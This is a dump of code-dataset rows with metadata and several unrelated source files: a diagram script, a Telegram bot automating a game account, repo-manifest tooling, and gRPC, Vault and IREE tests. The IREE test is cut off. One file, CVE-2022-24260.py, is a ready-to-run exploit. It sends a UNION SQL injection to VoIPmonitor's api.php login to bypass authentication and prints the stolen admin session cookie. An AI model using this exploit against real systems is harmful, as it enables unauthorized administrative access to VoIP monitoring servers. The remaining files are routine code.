hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4da90ebd6055194a7db43a600ad35402bead2a80 | 1,098 | py | Python | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | 1 | 2020-10-14T11:07:43.000Z | 2020-10-14T11:07:43.000Z | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | 1 | 2020-03-16T09:18:00.000Z | 2020-03-30T11:45:29.000Z | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | null | null | null | from diagrams import Cluster, Diagram, Edge
from diagrams.onprem.client import User
from diagrams.generic.place import Datacenter
from diagrams.onprem.network import Internet
from diagrams.saas.chat import Slack
from diagrams.onprem.vcs import Github
from diagrams.onprem.ci import Circleci
from diagrams.azure.compute import KubernetesServices
from diagrams.azure.general import Azurehome
from diagrams.azure.web import AppServices
from diagrams.azure.network import ApplicationGateway
from diagrams.azure.identity import ActiveDirectory
from diagrams.azure.devops import Devops
from diagrams.azure.compute import VMWindows
# Multi-line label describing the deployment request a user types into the UI.
text = "Create or update\n\nI want: \n\nname: feature-2079\n\nOrder: feature-2079\nUser&MD: 2020Q2\nShop: 2020Q2\nQuote: 2020Q2\nInventory: 2020Q2\n...\n\nUptime: working hours\n\nowner: abc@opuscapita.com"
# Render the User -> UI -> Github flow; show=False writes the image without opening a viewer.
with Diagram("\n\nHow user interface works with Github", show=False):
    u = User("User")
    ui = Internet("UI web app")
    gh = Github("OpusCapita/eproc-line-deployment")
    u >> Edge(label=text) >> ui >> Edge(label="Commit changes to\nbranch 'feature-2079'") >> gh
| 45.75 | 206 | 0.794171 |
59cd3bcc8ca3b77aebdef7e586a51b0a59fcade7 | 2,505 | py | Python | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | null | null | null | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | 9 | 2020-03-24T16:58:44.000Z | 2022-03-11T23:46:17.000Z | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | null | null | null | import time
import telethon.sync
from telethon import TelegramClient, events
from telethon.tl.types import PeerUser, PeerChat, PeerChannel
import asyncio
import datetime
import random
import argparse
# sample API_ID from https://github.com/telegramdesktop/tdesktop/blob/f98fdeab3fb2ba6f55daf8481595f879729d1b84/Telegram/SourceFiles/config.h#L220
# or use your own
api_id = ##
api_hash = ''##
# fill in your own details here
phone = ''##
username = ''##
password = '' # if you have two-step verification enabled
chatwars_bot_id = 265204902
chatwars_helper_id = 615010125
# content of the automatic reply
answer = "/go"
string_to_react = "/go"
test_string_to_react = "/shop"
client = TelegramClient(username, api_id, api_hash)
quests=["🌲Лес", "🍄Болото","⛰️Долина"]
event_quests = ["🍂Лихолесье", "🧟♀Мёртвые Топи", "🌋Лощина Дьявола"]
pet_game = "⚽️Поиграть"
pet_clean = "🛁Почистить"
castle_defense = "🛡Защита"
guild_defense = "/g_def"
@client.on(events.NewMessage(incoming=True))
async def _(event):
    """Auto-reply to private messages coming from the Chat Wars bot.

    On the battle call ("/go"): wait 5s (to look human), answer "/go", then
    send the guild-defense command a minute later.  On "/shop": reply with a
    liveness confirmation.
    """
    if event.is_private:
        bot_message = event.message.message
        if event.message.from_id == chatwars_bot_id:
            if bot_message and bot_message.find(string_to_react) != -1:
                await asyncio.sleep(5)
                msg = await client.send_message(event.message.from_id, answer)
                await asyncio.sleep(60)
                msg = await client.send_message(event.message.from_id, guild_defense)
            elif bot_message and bot_message.find(test_string_to_react) != -1:
                # Liveness probe: confirm the bot is still running.
                msg = await client.send_message(event.message.from_id, "Bot is alive")
async def main():
    """Endless quest loop: run 6 quests (~8.5 min each), defend the guild,
    then sleep out the remainder of the 480-minute battle cycle."""
    await client.start(phone, password)
    dialogs = await client.get_dialogs()
    while(True):
        t_start = datetime.datetime.now()
        print("Begin questing", t_start)
        for k in range(6):
            # Pick a random quest location; each quest takes about 8.5 minutes.
            msg = await client.send_message(chatwars_bot_id, random.choice(quests))
            await asyncio.sleep(8*60+30)
        msg = await client.send_message(chatwars_bot_id, guild_defense)
        t_end = datetime.datetime.now()
        # 480 minutes per cycle minus the time spent questing above.
        t_delta = 480*60 - (t_end - t_start).seconds
        print("Waiting for battle", t_delta)
        await asyncio.sleep(t_delta)
# NOTE(review): these statements execute at import time, BEFORE the
# __main__ guard below; run_until_disconnected() blocks until the client
# drops, so the guard is only reached after disconnection.
print(time.asctime(), '-', 'Auto-replying...')
client.run_until_disconnected()
print(time.asctime(), '-', 'Stopped!')
if __name__ == '__main__':
    # NOTE(review): the parser is created but parse_args() is never called.
    parser = argparse.ArgumentParser()
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
| 30.54878 | 145 | 0.680639 |
09d5bd888ddb0614cadc3367784f0a0ed57f8e2b | 77 | py | Python | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 726 | 2018-03-09T03:44:15.000Z | 2022-03-31T13:27:07.000Z | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 38 | 2018-03-14T01:46:44.000Z | 2022-01-21T14:16:08.000Z | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 60 | 2018-09-13T15:27:44.000Z | 2022-02-06T19:48:42.000Z | from unsync.unsync import unsync, Unfuture
__all__ = ["unsync", "Unfuture"]
| 19.25 | 42 | 0.74026 |
d11b4d9e5986c8a585eea834d7750f3375bce2f7 | 10,956 | py | Python | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (C) 2012-2013, The CyanogenMod Project
# (C) 2017-2018,2020-2021, The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import base64
import json
import netrc
import os
import re
import sys
try:
# For python3
import urllib.error
import urllib.parse
import urllib.request
except ImportError:
# For python2
import imp
import urllib2
import urlparse
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
from xml.etree import ElementTree
# Command line: argv[1] is the product ("lineage_bacon"), optional argv[2]
# switches to dependencies-only mode.
product = sys.argv[1]

if len(sys.argv) > 2:
    depsonly = sys.argv[2]
else:
    depsonly = None

try:
    # "vendor_device" -> "device"; fall back to the raw argument if there is
    # no underscore (str.index raises ValueError in that case).
    device = product[product.index("_") + 1:]
except ValueError:
    device = product

if not depsonly:
    print("Device %s not found. Attempting to retrieve device repository from ProjectBlaze Github (http://github.com/ProjectBlaze)." % device)

repositories = []

try:
    # Optional GitHub credentials from ~/.netrc; raises the API rate limit.
    authtuple = netrc.netrc().authenticators("api.github.com")

    if authtuple:
        auth_string = ('%s:%s' % (authtuple[0], authtuple[2])).encode()
        # base64.encodestring() was removed in Python 3.9; b64encode emits
        # no trailing newline, so no post-processing is needed.
        githubauth = base64.b64encode(auth_string).decode()
    else:
        githubauth = None
except Exception:
    # No ~/.netrc (or no api.github.com entry): fall back to anonymous access.
    githubauth = None
def add_auth(githubreq):
    """Attach the optional GitHub Basic-auth header to *githubreq* in place."""
    if not githubauth:
        return
    githubreq.add_header("Authorization", "Basic %s" % githubauth)
if not depsonly:
    # Ask the GitHub search API for repositories named after the device under
    # the blazeOS user (forks included).
    githubreq = urllib.request.Request("https://api.github.com/search/repositories?q=%s+user:blazeOS+in:name+fork:true" % device)
    add_auth(githubreq)
    try:
        result = json.loads(urllib.request.urlopen(githubreq).read().decode())
    except urllib.error.URLError:
        print("Failed to search GitHub")
        sys.exit(1)
    except ValueError:
        print("Failed to parse return data from GitHub")
        sys.exit(1)
    for res in result.get('items', []):
        repositories.append(res)
local_manifests = r'.repo/local_manifests'
if not os.path.exists(local_manifests): os.makedirs(local_manifests)
def exists_in_tree(lm, path):
    """Return True if manifest element *lm* has a direct child at *path*.

    Iterates the element directly instead of calling Element.getchildren(),
    which was deprecated and removed in Python 3.9.  Children without a
    ``path`` attribute (e.g. <remote> entries) are skipped instead of
    raising KeyError.
    """
    for child in lm:
        if child.attrib.get('path') == path:
            return True
    return False
def indent(elem, level=0):
    """Pretty-print *elem* in place by injecting newline/indent whitespace.

    Existing non-whitespace text/tail content is left untouched; only
    missing or all-whitespace slots are filled.
    """
    pad = "\n" + level * "  "
    children = list(elem)
    if children:
        if not (elem.text and elem.text.strip()):
            elem.text = pad + "  "
        if not (elem.tail and elem.tail.strip()):
            elem.tail = pad
        for child in children:
            indent(child, level + 1)
        # Re-align the last child's tail with this element's closing tag.
        last = children[-1]
        if not (last.tail and last.tail.strip()):
            last.tail = pad
    else:
        if level and not (elem.tail and elem.tail.strip()):
            elem.tail = pad
def get_manifest_path():
    '''Find the current manifest path
    In old versions of repo this is at .repo/manifest.xml
    In new versions, .repo/manifest.xml includes an include
    to some arbitrary file in .repo/manifests'''
    m = ElementTree.parse(".repo/manifest.xml")
    try:
        # A <default> element means this is a full, old-style manifest.
        m.findall('default')[0]
        return '.repo/manifest.xml'
    except IndexError:
        # New-style: the real manifest is referenced via an <include> element.
        return ".repo/manifests/{}".format(m.find("include").get("name"))
def get_default_revision():
    """Return the manifest's default revision with any ref prefix stripped."""
    manifest = ElementTree.parse(get_manifest_path())
    revision = manifest.findall('default')[0].get('revision')
    for prefix in ('refs/heads/', 'refs/tags/'):
        revision = revision.replace(prefix, '')
    return revision
def get_from_manifest(devicename):
    """Return the checkout path of *devicename*'s device repo from the local
    roomservice manifest, or None if it is not listed.

    Fixes: the original matched against the module-level ``device`` global,
    silently ignoring the ``devicename`` parameter, and used an unescaped
    regex and a bare ``except:``.
    """
    try:
        lm = ElementTree.parse(".repo/local_manifests/roomservice.xml").getroot()
    except (OSError, ElementTree.ParseError):
        # No local manifest yet (or it is malformed): treat as empty.
        lm = ElementTree.Element("manifest")

    pattern = "android_device_.*_%s$" % re.escape(devicename)
    for localpath in lm.findall("project"):
        if re.search(pattern, localpath.get("name")):
            return localpath.get("path")
    return None
def is_in_manifest(projectpath):
    """Return True if *projectpath* is already checked out by any manifest:
    the roomservice local manifest, the main manifest, or the blaze snippet.
    A manifest that cannot be read/parsed is treated as empty."""
    # NOTE(review): the bare except also swallows unrelated errors
    # (including NameError/KeyboardInterrupt) — consider narrowing.
    try:
        lm = ElementTree.parse(".repo/local_manifests/roomservice.xml")
        lm = lm.getroot()
    except:
        lm = ElementTree.Element("manifest")
    for localpath in lm.findall("project"):
        if localpath.get("path") == projectpath:
            return True
    # Search in main manifest, too
    try:
        lm = ElementTree.parse(get_manifest_path())
        lm = lm.getroot()
    except:
        lm = ElementTree.Element("manifest")
    for localpath in lm.findall("project"):
        if localpath.get("path") == projectpath:
            return True
    # ... and don't forget the blaze snippet
    try:
        lm = ElementTree.parse(".repo/manifests/snippets/blaze.xml")
        lm = lm.getroot()
    except:
        lm = ElementTree.Element("manifest")
    for localpath in lm.findall("project"):
        if localpath.get("path") == projectpath:
            return True
    return False
def add_to_manifest(repositories, fallback_branch = None):
    """Append <project> entries for *repositories* (dicts with 'repository'
    and 'target_path', optionally 'branch') to the roomservice local
    manifest, then rewrite the file.  Entries already present anywhere in
    the manifests are skipped."""
    try:
        lm = ElementTree.parse(".repo/local_manifests/roomservice.xml")
        lm = lm.getroot()
    except:
        lm = ElementTree.Element("manifest")
    for repository in repositories:
        repo_name = repository['repository']
        repo_target = repository['target_path']
        print('Checking if %s is fetched from %s' % (repo_target, repo_name))
        if is_in_manifest(repo_target):
            print('ProjectBlaze/%s already fetched to %s' % (repo_name, repo_target))
            continue
        print('Adding dependency: ProjectBlaze/%s -> %s' % (repo_name, repo_target))
        project = ElementTree.Element("project", attrib = { "path": repo_target,
            "remote": "github", "name": "ProjectBlaze/%s" % repo_name })
        # Pin an explicit revision when one is known; otherwise let repo use
        # the manifest's default branch.
        if 'branch' in repository:
            project.set('revision',repository['branch'])
        elif fallback_branch:
            print("Using fallback branch %s for %s" % (fallback_branch, repo_name))
            project.set('revision', fallback_branch)
        else:
            print("Using default branch for %s" % repo_name)
        lm.append(project)
    indent(lm, 0)
    raw_xml = ElementTree.tostring(lm).decode()
    raw_xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + raw_xml
    f = open('.repo/local_manifests/roomservice.xml', 'w')
    f.write(raw_xml)
    f.close()
def fetch_dependencies(repo_path, fallback_branch = None):
    """Read <repo_path>/blaze.dependencies (a JSON list of dependency dicts),
    add any missing entries to the local manifest, 'repo sync' what needs
    syncing, then recurse into each dependency's own dependencies."""
    print('Looking for dependencies in %s' % repo_path)
    dependencies_path = repo_path + '/blaze.dependencies'
    syncable_repos = []
    verify_repos = []
    if os.path.exists(dependencies_path):
        dependencies_file = open(dependencies_path, 'r')
        dependencies = json.loads(dependencies_file.read())
        fetch_list = []
        for dependency in dependencies:
            if not is_in_manifest(dependency['target_path']):
                # Not in any manifest yet: add, sync, and recurse later.
                fetch_list.append(dependency)
                syncable_repos.append(dependency['target_path'])
                verify_repos.append(dependency['target_path'])
            else:
                # Already in a manifest; sync only if the checkout is missing.
                verify_repos.append(dependency['target_path'])
                if not os.path.isdir(dependency['target_path']):
                    syncable_repos.append(dependency['target_path'])
        dependencies_file.close()
        if len(fetch_list) > 0:
            print('Adding dependencies to manifest')
            add_to_manifest(fetch_list, fallback_branch)
    else:
        print('%s has no additional dependencies.' % repo_path)
    if len(syncable_repos) > 0:
        print('Syncing dependencies')
        os.system('repo sync --force-sync %s' % ' '.join(syncable_repos))
    # Transitive dependencies: every dependency may declare its own.
    for deprepo in verify_repos:
        fetch_dependencies(deprepo)
def has_branch(branches, revision):
    """Return True if any branch/tag dict in *branches* is named *revision*."""
    return any(branch['name'] == revision for branch in branches)
# Entry logic: dependencies-only mode just refreshes an existing device
# tree's dependencies; otherwise search the GitHub results for the device
# repo, add it to the local manifest, sync it, and pull its dependencies.
if depsonly:
    repo_path = get_from_manifest(device)
    if repo_path:
        fetch_dependencies(repo_path)
    else:
        print("Trying dependencies-only mode on a non-existing device tree?")
    sys.exit()
else:
    for repository in repositories:
        repo_name = repository['name']
        if re.match(r"^android_device_[^_]*_" + device + "$", repo_name):
            print("Found repository: %s" % repository['name'])
            # "android_device_<manufacturer>_<device>" -> "<manufacturer>"
            manufacturer = repo_name.replace("android_device_", "").replace("_" + device, "")
            default_revision = get_default_revision()
            print("Default revision: %s" % default_revision)
            print("Checking branch info")
            githubreq = urllib.request.Request(repository['branches_url'].replace('{/branch}', ''))
            add_auth(githubreq)
            result = json.loads(urllib.request.urlopen(githubreq).read().decode())
            ## Try tags, too, since that's what releases use
            if not has_branch(result, default_revision):
                githubreq = urllib.request.Request(repository['tags_url'].replace('{/tag}', ''))
                add_auth(githubreq)
                result.extend (json.loads(urllib.request.urlopen(githubreq).read().decode()))
            repo_path = "device/%s/%s" % (manufacturer, device)
            adding = {'repository':repo_name,'target_path':repo_path}
            fallback_branch = None
            if not has_branch(result, default_revision):
                # Default revision missing upstream: try user-supplied fallbacks.
                if os.getenv('ROOMSERVICE_BRANCHES'):
                    fallbacks = list(filter(bool, os.getenv('ROOMSERVICE_BRANCHES').split(' ')))
                    for fallback in fallbacks:
                        if has_branch(result, fallback):
                            print("Using fallback branch: %s" % fallback)
                            fallback_branch = fallback
                            break
                if not fallback_branch:
                    print("Default revision %s not found in %s. Bailing." % (default_revision, repo_name))
                    print("Branches found:")
                    for branch in [branch['name'] for branch in result]:
                        print(branch)
                    print("Use the ROOMSERVICE_BRANCHES environment variable to specify a list of fallback branches.")
                    sys.exit()
            add_to_manifest([adding], fallback_branch)
            print("Syncing repository to retrieve project.")
            os.system('repo sync --force-sync %s' % repo_path)
            print("Repository synced!")
            fetch_dependencies(repo_path, fallback_branch)
            print("Done")
            sys.exit()
    print("Repository for %s not found in the ProjectBlaze Github repository list. If this is in error, you may need to manually add it to your local_manifests/roomservice.xml." % device)
| 34.344828 | 183 | 0.627145 |
49d683b8a6cb411b5aca88e98b2114061ed16df5 | 2,140 | py | Python | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | 4 | 2018-05-21T03:46:34.000Z | 2022-03-31T03:19:46.000Z | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | null | null | null | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | 2 | 2018-04-12T02:12:49.000Z | 2020-09-06T08:08:19.000Z | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests of grpc.beta._connectivity_channel."""
import unittest
from grpc.beta import interfaces
class ConnectivityStatesTest(unittest.TestCase):
    """Checks that every beta channel-connectivity state is defined."""

    def testBetaConnectivityStates(self):
        # All five beta states must be present and non-None on the class.
        for state_name in ("IDLE", "CONNECTING", "READY",
                           "TRANSIENT_FAILURE", "FATAL_FAILURE"):
            self.assertIsNotNone(
                getattr(interfaces.ChannelConnectivity, state_name))
if __name__ == '__main__':
unittest.main(verbosity=2)
| 44.583333 | 78 | 0.784579 |
2c8ec5a7a151e7d3e0cb17245f1498501ddd1fe8 | 3,189 | py | Python | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | # (C) Datadog, Inc. 2018-2019
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
from collections import defaultdict
import pytest
from datadog_checks.vault import Vault
from .metrics import METRICS
from .utils import run_check
@pytest.mark.usefixtures('dd_environment')
@pytest.mark.integration
def test_integration(aggregator, check, instance, global_tags):
    """Run the Vault check once against a live environment and verify the
    collected metrics/service checks."""
    instance = instance()
    check = check(instance)
    run_check(check)
    assert_collection(aggregator, global_tags)
@pytest.mark.e2e
def test_e2e(dd_agent_check, e2e_instance, global_tags):
    """Run the check through a real agent (rate=True triggers two runs)."""
    aggregator = dd_agent_check(e2e_instance, rate=True)
    assert_collection(aggregator, global_tags, runs=2)
def assert_collection(aggregator, tags, runs=1):
    """Assert that every expected Vault metric was collected with *tags*,
    expanding summary metrics into .count/.quantile/.sum and tolerating up
    to two missing sub-metrics per summary.  *runs* is the expected number
    of service-check submissions."""
    metrics = set(METRICS)
    metrics.add('is_leader')
    # Remove metrics that only appear occasionally
    for metric in list(metrics):
        if metric.startswith(('vault.rollback.', 'vault.route.rollback.')):
            metrics.remove(metric)
    # Summaries
    summaries = {'go.gc.duration.seconds'}
    summaries.update(metric for metric in metrics if metric.startswith('vault.'))
    # Remove everything that either is not a summary or summaries for which we're getting all 3 as NaN
    for metric in (
        'vault.audit.log.request.failure',
        'vault.expire.num_leases',
        'vault.runtime.alloc.bytes',
        'vault.runtime.free.count',
        'vault.runtime.heap.objects',
        'vault.runtime.malloc.count',
        'vault.runtime.num_goroutines',
        'vault.runtime.sys.bytes',
        'vault.runtime.total.gc.pause_ns',
        'vault.runtime.total.gc.runs',
    ):
        summaries.remove(metric)
    # Each summary is reported as three sub-metrics, not as itself.
    for metric in summaries:
        metrics.remove(metric)
        metrics.update({'{}.count'.format(metric), '{}.quantile'.format(metric), '{}.sum'.format(metric)})
    missing_summaries = defaultdict(list)
    for metric in sorted(metrics):
        metric = 'vault.{}'.format(metric)
        for tag in tags:
            try:
                aggregator.assert_metric_has_tag(metric, tag)
            # For some reason explicitly handling AssertionError does not catch AssertionError
            except Exception:
                possible_summary = re.sub(r'^vault\.|(\.count|\.quantile|\.sum)$', '', metric)
                if possible_summary in summaries:
                    # Track it; a summary may legitimately miss some parts.
                    missing_summaries[possible_summary].append(metric)
                else:
                    raise
        else:
            # for/else: runs when every tag check passed without break.
            aggregator.assert_metric_has_tag_prefix(metric, 'is_leader:')
            aggregator.assert_metric_has_tag_prefix(metric, 'cluster_name:')
            aggregator.assert_metric_has_tag_prefix(metric, 'vault_version:')
    # Fail only if a summary is missing all three of its sub-metrics.
    for _, summaries in sorted(missing_summaries.items()):
        if len(summaries) > 2:
            raise AssertionError('Missing: {}'.format(' | '.join(summaries)))
    aggregator.assert_service_check(Vault.SERVICE_CHECK_CONNECT, Vault.OK, count=runs)
    aggregator.assert_service_check(Vault.SERVICE_CHECK_UNSEALED, Vault.OK, count=runs)
    aggregator.assert_service_check(Vault.SERVICE_CHECK_INITIALIZED, Vault.OK, count=runs)
| 35.433333 | 106 | 0.67576 |
ffc3b12ad1de2efe7c41138fa659445519d83cd1 | 1,682 | py | Python | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | import requests
import argparse
def parse_args():
    """Parse the command line: a required target URL and an optional proxy."""
    cli = argparse.ArgumentParser(prog="python3 CVE-2022-24260.py")
    cli.add_argument('-u', '--url', type=str, required=True, default=None)
    cli.add_argument(
        '--proxy', type=str, required=False, default=None,
        help="Proxy URL, support HTTP proxies (Example: http://127.0.0.1:8080)")
    return cli.parse_args()
def exploit(url, proxies):
    """Send the CVE-2022-24260 SQL-injection login request to VoIPmonitor's
    api.php and report whether an admin session was obtained."""
    url = url+"/api.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
               "Content-Type": "application/x-www-form-urlencoded"}
    # UNION-based SQLi in the "user" field forges an 'admin'/'admin' result row.
    data = {"module": "relogin", "action": "login", "pass": "nope", "user": "a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"}
    res = requests.post(url, headers=headers, data=data,
                        proxies=proxies, verify=False)
    if ('"success":true' in res.text):
        # Login bypass worked: the returned session cookie is an admin session.
        print("Success! Cookie admin is "+res.headers['Set-Cookie'])
    else:
        print("Not vulnerable")
def main():
    """Entry point: parse CLI arguments and run the exploit."""
    args = parse_args()
    url = args.url
    # The same proxy (possibly None) is used for both schemes.
    proxies = {
        "http": args.proxy,
        "https": args.proxy
    }
    print(url)
    exploit(url, proxies)
main()
| 44.263158 | 560 | 0.661712 |
61b629753f479ee3f6877c98c10e055c5c585130 | 3,874 | py | Python | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | null | null | null | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | 1 | 2021-06-16T12:18:44.000Z | 2021-06-16T12:18:44.000Z | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | null | null | null | # Lint as: python3
# Copyright 2019 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# pylint: disable=unused-variable
import re
from absl import logging
from absl.testing import absltest
import iree.compiler
import iree.runtime
import numpy as np
def create_simple_mul_module():
  """Compile a tiny MHLO module (elementwise 4xf32 multiply) and load it
  as an IREE VM module for the tests below."""
  binary = iree.compiler.compile_str(
      """
      module @arithmetic {
        func @simple_mul(%arg0: tensor<4xf32>, %arg1: tensor<4xf32>) -> tensor<4xf32> {
          %0 = "mhlo.multiply"(%arg0, %arg1) {name = "mul.1"} : (tensor<4xf32>, tensor<4xf32>) -> tensor<4xf32>
          return %0 : tensor<4xf32>
        }
      }
      """,
      input_type="mhlo",
      target_backends=iree.compiler.core.DEFAULT_TESTING_BACKENDS,
  )
  m = iree.runtime.VmModule.from_flatbuffer(binary)
  return m
class SystemApiTest(absltest.TestCase):
  """Tests for iree.runtime's system API: config/driver creation, dynamic
  and static module contexts, and module invocation."""
  def test_non_existing_driver(self):
    with self.assertRaisesRegex(RuntimeError,
                                "Could not create any requested driver"):
      config = iree.runtime.Config("nothere1,nothere2")
  def test_subsequent_driver(self):
    # Falls through the bogus driver name to the working "dylib" driver.
    config = iree.runtime.Config("nothere1,dylib")
  def test_empty_dynamic(self):
    ctx = iree.runtime.SystemContext()
    self.assertTrue(ctx.is_dynamic)
    self.assertIn("hal", ctx.modules)
    self.assertEqual(ctx.modules.hal.name, "hal")
  def test_empty_static(self):
    ctx = iree.runtime.SystemContext(vm_modules=())
    self.assertFalse(ctx.is_dynamic)
    self.assertIn("hal", ctx.modules)
    self.assertEqual(ctx.modules.hal.name, "hal")
  def test_custom_dynamic(self):
    ctx = iree.runtime.SystemContext()
    self.assertTrue(ctx.is_dynamic)
    ctx.add_vm_module(create_simple_mul_module())
    self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
    f = ctx.modules.arithmetic["simple_mul"]
